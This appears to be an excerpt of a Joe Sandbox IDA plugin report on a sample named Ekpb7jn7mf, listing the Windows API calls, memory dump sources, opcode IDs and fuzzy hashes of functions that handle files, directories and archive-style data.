                                                                                    • Part of subcall function 00410C6C: GetLastError.KERNEL32(?), ref: 00410C7E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: Close$HandleReleaseSemaphore$ChangeCriticalDeleteErrorEventFindLastNotificationObjectResetSectionSingleWait
                                                                                  • String ID:
                                                                                  • API String ID: 565839277-0
                                                                                  • Opcode ID: b0c5eb44cc48d8aeceb54ba9457ac5ae927773a95a9fa64fa26639590f07cc77
                                                                                  • Instruction ID: 39e3286da5e2b9f463cf34e71c08a22c4378c42c6e023b13eb84673481210850
                                                                                  • Opcode Fuzzy Hash: b0c5eb44cc48d8aeceb54ba9457ac5ae927773a95a9fa64fa26639590f07cc77
                                                                                  • Instruction Fuzzy Hash: 88F06275101708DFD7316B74DC85AE7BBA9FB06315F00082AE69A41120CA7768A19B64

                                                                                  Control-flow Graph (figure; legend: Executed, Not Executed; basic blocks 419a27..419a7d calling GetClassNameW, 411bd1, FindWindowExW, SHAutoComplete)
                                                                                  APIs
                                                                                  • GetClassNameW.USER32(?,?,00000050), ref: 00419A3E
                                                                                  • SHAutoComplete.SHLWAPI(?,00000010), ref: 00419A75
                                                                                    • Part of subcall function 00411BD1: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,00000000,000000FF,00409BC8,?,00000000,?,00409CE2,00000000,-00000002,?,00000000,?), ref: 00411BE7
                                                                                  • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00419A65
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                  • String ID: EDIT
                                                                                  • API String ID: 4243998846-3080729518
                                                                                  • Opcode ID: e0083f4051276fdce15bceb59e3080037d6ac23fe363074340fa8ca1fa73ee92
                                                                                  • Instruction ID: e0580f26e7dba7dbc242a01744853ed5fd2560c4a83a58afe7298293889790c2
                                                                                  • Opcode Fuzzy Hash: e0083f4051276fdce15bceb59e3080037d6ac23fe363074340fa8ca1fa73ee92
                                                                                  • Instruction Fuzzy Hash: A1F082323002186BD73097259C45FFB766C9F86B90F580066FE05E2290D768E99685BE
                                                                                  APIs
                                                                                  • CreateFileW.KERNELBASE(?,-80000000,?,00000000,00000003,-00000001,00000000,00000000,00000000,?,00000000,00406DBE,00000000,00000005,?,00000011), ref: 00408774
                                                                                  • GetLastError.KERNEL32(?,00000000,00406DBE,00000000,00000005,?,00000011,00000000,?,00000000,?,0000003A,00000802,?,00000000,00000802), ref: 0040877D
                                                                                  • CreateFileW.KERNEL32(?,-80000000,?,00000000,00000003,00000000,00000000,?,?,00000800,?,00000000,00406DBE,00000000,00000005,?), ref: 004087B5
                                                                                  • GetLastError.KERNEL32(?,00000000,00406DBE,00000000,00000005,?,00000011,00000000,?,00000000,?,0000003A,00000802,?,00000000,00000802), ref: 004087B9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateErrorFileLast
                                                                                  • String ID:
                                                                                  • API String ID: 1214770103-0
                                                                                  • Opcode ID: 5686757e3dffccfcd5476853105c90ad9b2e846fe1c9ad7ee051c9ad47f40b56
                                                                                  • Instruction ID: 062e89898b874755b3d9a5fb51e5e37505543be931fef43769ed50a19f90df97
                                                                                  • Opcode Fuzzy Hash: 5686757e3dffccfcd5476853105c90ad9b2e846fe1c9ad7ee051c9ad47f40b56
                                                                                  • Instruction Fuzzy Hash: 393158725047445BE7308B218D05BEBB7E4AB84718F204A2EF5D0A33C0DBB995498766
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0040184F
                                                                                    • Part of subcall function 00405F34: __EH_prolog.LIBCMT ref: 00405F39
                                                                                    • Part of subcall function 00405F34: _memset.LIBCMT ref: 00405F9C
                                                                                    • Part of subcall function 00405F34: _memset.LIBCMT ref: 00405FA8
                                                                                    • Part of subcall function 00405F34: _memset.LIBCMT ref: 00405FC6
                                                                                    • Part of subcall function 0040B7B1: __EH_prolog.LIBCMT ref: 0040B7B6
                                                                                  • _memset.LIBCMT ref: 00401992
                                                                                  • _memset.LIBCMT ref: 004019A1
                                                                                  • _memset.LIBCMT ref: 004019B0
                                                                                    • Part of subcall function 0041A60A: _malloc.LIBCMT ref: 0041A624
                                                                                    • Part of subcall function 00409F46: __EH_prolog.LIBCMT ref: 00409F4B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$H_prolog$_malloc
                                                                                  • String ID:
                                                                                  • API String ID: 4233843809-0
                                                                                  • Opcode ID: cea251618a4196baa60a09cdfc26b4b325674e0615a38645109e1af8a8a80c47
                                                                                  • Instruction ID: 2fede72ccba09c749f0c8c909b52ed34bb2e7ac5ad8f76669cac34c0b6f6f395
                                                                                  • Opcode Fuzzy Hash: cea251618a4196baa60a09cdfc26b4b325674e0615a38645109e1af8a8a80c47
                                                                                  • Instruction Fuzzy Hash: B0510771845F809EC331DF7A88916C7FFE0AB29310F94496E91FE93282D7352658CB29
                                                                                  APIs
                                                                                  • GetStdHandle.KERNEL32(000000F6,004325AC,?,00000000,?,?,00408DD0,?,00000000,00000800,?,00000000), ref: 00408BD1
                                                                                  • ReadFile.KERNELBASE(?,?,00000800,00000000,00000000,004325AC,?,00000000,?,?,00408DD0,?,00000000,00000800,?,00000000), ref: 00408BE9
                                                                                  • GetLastError.KERNEL32(?,00408DD0,?,00000000,00000800,?,00000000), ref: 00408C21
                                                                                  • GetLastError.KERNEL32(?,00408DD0,?,00000000,00000800,?,00000000), ref: 00408C3C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$FileHandleRead
                                                                                  • String ID:
                                                                                  • API String ID: 2244327787-0
                                                                                  • Opcode ID: c610f9014d8eeb7b064f26712c9d4da67e362c16071d56148ef50c45903ee7ce
                                                                                  • Instruction ID: 13e8381ba76e660ca590a80f80ea056ccdaf7de13a99e612f72684c5f07020c7
                                                                                  • Opcode Fuzzy Hash: c610f9014d8eeb7b064f26712c9d4da67e362c16071d56148ef50c45903ee7ce
                                                                                  • Instruction Fuzzy Hash: 3011A370609604EFEF249B60CA4096A37B9FB51374F10943FE596A52D4DE39DC81CB3A
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 004075F5
                                                                                    • Part of subcall function 004188B2: _wcscpy.LIBCMT ref: 0041899B
                                                                                  • _memcmp.LIBCMT ref: 00407BC9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog_memcmp_wcscpy
                                                                                  • String ID: E
                                                                                  • API String ID: 1926841707-3568589458
                                                                                  • Opcode ID: aa54b7e7266cf7c08b5d2f9acdba42abb51fdcad739be4ed2ccc402481056f02
                                                                                  • Instruction ID: f9c8af1df3ef5d7c4a70e700ce4102f6c5c0276540fb6f08cb0a114df9005495
                                                                                  • Opcode Fuzzy Hash: aa54b7e7266cf7c08b5d2f9acdba42abb51fdcad739be4ed2ccc402481056f02
                                                                                  • Instruction Fuzzy Hash: BC72A770D086859AEF25DB64C444BEB7BA55F01304F0840FFE94A6B2D2C77D7A84CB6A
                                                                                  APIs
                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0040CFD9
                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0040CFEA
                                                                                  • TranslateMessage.USER32(?), ref: 0040CFF4
                                                                                  • DispatchMessageW.USER32(?), ref: 0040CFFE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message$DispatchPeekTranslate
                                                                                  • String ID:
                                                                                  • API String ID: 4217535847-0
                                                                                  • Opcode ID: 3bcc0019167008ed6046610103470990902ffce4856a4c3d90b832063c98dd80
                                                                                  • Instruction ID: e8fdd0a554a2632d2ff0352f7197dd0651b976686c93187f285c53448bd4587f
                                                                                  • Opcode Fuzzy Hash: 3bcc0019167008ed6046610103470990902ffce4856a4c3d90b832063c98dd80
                                                                                  • Instruction Fuzzy Hash: 0AE0ED72E0222AB7CB30ABE1AC0CCDBBF6CEE062657404021BD05E2014D638D116C7F5
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00408130
                                                                                    • Part of subcall function 0040184A: __EH_prolog.LIBCMT ref: 0040184F
                                                                                    • Part of subcall function 0040184A: _memset.LIBCMT ref: 00401992
                                                                                    • Part of subcall function 0040184A: _memset.LIBCMT ref: 004019A1
                                                                                    • Part of subcall function 0040184A: _memset.LIBCMT ref: 004019B0
                                                                                    • Part of subcall function 00401440: __EH_prolog.LIBCMT ref: 00401445
                                                                                  • _wcscpy.LIBCMT ref: 004081CF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog_memset$_wcscpy
                                                                                  • String ID: rar
                                                                                  • API String ID: 2876264062-1792618458
                                                                                  • Opcode ID: a84578caa249fda90f0110424be84e90377f3ec811dce38ddd6535a8ee302c02
                                                                                  • Instruction ID: 3983f395f1bbe4ca3dd186b8fcdf25185155a986bbeb1fad17e19b91f567a397
                                                                                  • Opcode Fuzzy Hash: a84578caa249fda90f0110424be84e90377f3ec811dce38ddd6535a8ee302c02
                                                                                  • Instruction Fuzzy Hash: D641A671944658AEDB24EB60C945BEA77B8AF14308F0448FFE48973182DB785FC4CB19
                                                                                  APIs
                                                                                  • __CxxThrowException@8.LIBCMT ref: 004124DC
                                                                                  • _malloc.LIBCMT ref: 004124F6
                                                                                    • Part of subcall function 0041CCEE: __FF_MSGBANNER.LIBCMT ref: 0041CD11
                                                                                    • Part of subcall function 0041CCEE: __NMSG_WRITE.LIBCMT ref: 0041CD18
                                                                                    • Part of subcall function 0041CCEE: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,004210A4,00000000,00000001,00000000,?,0041ECDD,00000018,0042D8B8,0000000C,0041ED6E), ref: 0041CD65
                                                                                  • _memset.LIBCMT ref: 00412549
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocateException@8HeapThrow_malloc_memset
                                                                                  • String ID:
                                                                                  • API String ID: 3965744532-0
                                                                                  • Opcode ID: 5fe1e4f97fa9e211ee17084620d103a7d09ce5600d60130a885b20d2347bc829
                                                                                  • Instruction ID: 51269822a4ebdb960cecbe3bc0489266129fd98c847df25caf6003947ae78722
                                                                                  • Opcode Fuzzy Hash: 5fe1e4f97fa9e211ee17084620d103a7d09ce5600d60130a885b20d2347bc829
                                                                                  • Instruction Fuzzy Hash: 214104B0901744ABEB21DE78DAC47DA77D0AB14305F10482FE489D7241D7B8AAE0875C
                                                                                  APIs
                                                                                  • GetStdHandle.KERNEL32(000000F5,?,?,?,0040BA0F,?,?,00000000,?,?,0041225E,?,?,?,00000001,?), ref: 004089E5
                                                                                  • WriteFile.KERNEL32(00000001,?,00004000,?,00000000,?,?,0040BA0F,?,?,00000000,?,?,0041225E,?,?), ref: 00408A21
                                                                                  • WriteFile.KERNELBASE(00000001,?,00000000,?,00000000,?,?,?,?,?,0040BA0F,?,?,00000000,?,?), ref: 00408A4D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileWrite$Handle
                                                                                  • String ID:
                                                                                  • API String ID: 4209713984-0
                                                                                  • Opcode ID: 60fdaaf5b18fd68c24a91242a2dbbc34deab907d478245023e1af0c3568f0ee7
                                                                                  • Instruction ID: 7dafab93038a227be19c913a50d78580f7211669e4596883db46a55b3dbd462d
                                                                                  • Opcode Fuzzy Hash: 60fdaaf5b18fd68c24a91242a2dbbc34deab907d478245023e1af0c3568f0ee7
                                                                                  • Instruction Fuzzy Hash: 0531F271340604AFDB249F24CA44BBB77A9EB94710F04813FE896AB6C1DB38AD45CF19
                                                                                  APIs
                                                                                    • Part of subcall function 00409FAA: _wcslen.LIBCMT ref: 00409FB0
                                                                                  • CreateDirectoryW.KERNELBASE(00000000,00000000,00000000,?,?,?,0040933E,?,00000001,00000000,?,?,?,?,?), ref: 00409219
                                                                                  • CreateDirectoryW.KERNEL32(?,00000000,00000000,?,00000800,00000000,00000000,?,?,?,0040933E,?,00000001,00000000,?,?), ref: 00409248
                                                                                  • GetLastError.KERNEL32(00000000,00000000,?,?,?,0040933E,?,00000001,00000000,?,?,?,?,?,?,0040672F), ref: 00409261
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateDirectory$ErrorLast_wcslen
                                                                                  • String ID:
                                                                                  • API String ID: 2260680371-0
                                                                                  • Opcode ID: 414090fd1d27a7ec09d3ce4284bc2b3f1832e7866cd796565000b453ae27314c
                                                                                  • Instruction ID: 23bfc136bf6baec306a6366cc8aa037d8679fca5358ed8655fcd7ed6102d0436
                                                                                  • Opcode Fuzzy Hash: 414090fd1d27a7ec09d3ce4284bc2b3f1832e7866cd796565000b453ae27314c
                                                                                  • Instruction Fuzzy Hash: 9F012E2520420575EF2167264C05FBB722C9B86B84F0848BFF941F22D3CA3CEC92867A
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0040E18C
                                                                                  • _wcscpy.LIBCMT ref: 0040E1AC
                                                                                    • Part of subcall function 00410AC0: _wcslen.LIBCMT ref: 00410AD6
                                                                                    • Part of subcall function 00410AC0: _wcscpy.LIBCMT ref: 00410AEC
                                                                                  • _wcscpy.LIBCMT ref: 0040E1CA
                                                                                    • Part of subcall function 00407096: __EH_prolog.LIBCMT ref: 0040709B
                                                                                    • Part of subcall function 00406FBA: __EH_prolog.LIBCMT ref: 00406FBF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog_wcscpy$_wcslen
                                                                                  • String ID:
                                                                                  • API String ID: 2067596392-0
                                                                                  • Opcode ID: 62faf8865d871e777e31c7bdaaaf3d23f743130b80ce5055fa305da7b72432e0
                                                                                  • Instruction ID: 27d61f072e75d13073c2fbb57f14699bfe0c36fd78bc515b06fc75f56fee3a50
                                                                                  • Opcode Fuzzy Hash: 62faf8865d871e777e31c7bdaaaf3d23f743130b80ce5055fa305da7b72432e0
                                                                                  • Instruction Fuzzy Hash: D0113A75A0A254FED701EB65E8427CD7BB1EB16718F14406FF04462282CFBD1A51CB6E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID: CMT
                                                                                  • API String ID: 3519838083-2756464174
                                                                                  • Opcode ID: 96e274538cfab30d32c2c5afd198a28cd0a783dd8aa7f54393f5780403129076
                                                                                  • Instruction ID: ba9e54cebe165e43e12e4b41765bdf979fe8c4f2b39543410f45230b8d029d34
                                                                                  • Opcode Fuzzy Hash: 96e274538cfab30d32c2c5afd198a28cd0a783dd8aa7f54393f5780403129076
                                                                                  • Instruction Fuzzy Hash: A221C371604554AFCB15AF6488909AEBBA9EF45324B04C06EF856673A2C7395E01CB68
                                                                                  APIs
                                                                                  • _realloc.LIBCMT ref: 0040115B
                                                                                    • Part of subcall function 004063AD: __vswprintf_c_l.LIBCMT ref: 004063CB
                                                                                  Strings
                                                                                  • Maximum allowed array size (%u) is exceeded, xrefs: 0040112C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: __vswprintf_c_l_realloc
                                                                                  • String ID: Maximum allowed array size (%u) is exceeded
                                                                                  • API String ID: 620378156-979119166
                                                                                  • Opcode ID: ac7e39a56722bfb5e628e20bc35834a97851e67a4835175f81a6780a152830dd
                                                                                  • Instruction ID: bb51bb8f72ddee3e18bd46bc894267ff4a261c1e0a85f7424ebd2ae05975c311
                                                                                  • Opcode Fuzzy Hash: ac7e39a56722bfb5e628e20bc35834a97851e67a4835175f81a6780a152830dd
                                                                                  • Instruction Fuzzy Hash: C701A2353003055FD728AA25D89193FB3DAEF88764310443FE9ABA7B91EA39BC508718
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID:
                                                                                  • API String ID: 3519838083-0
                                                                                  • Opcode ID: cd7338f795f66c19b3d9cd1e26c83d9273c7355705f52096d0b564cf6d22c47a
                                                                                  • Instruction ID: e30dfece3b806704b98678fd7eff66dc4256349ef370d001556c8b63c1fc4a25
                                                                                  • Opcode Fuzzy Hash: cd7338f795f66c19b3d9cd1e26c83d9273c7355705f52096d0b564cf6d22c47a
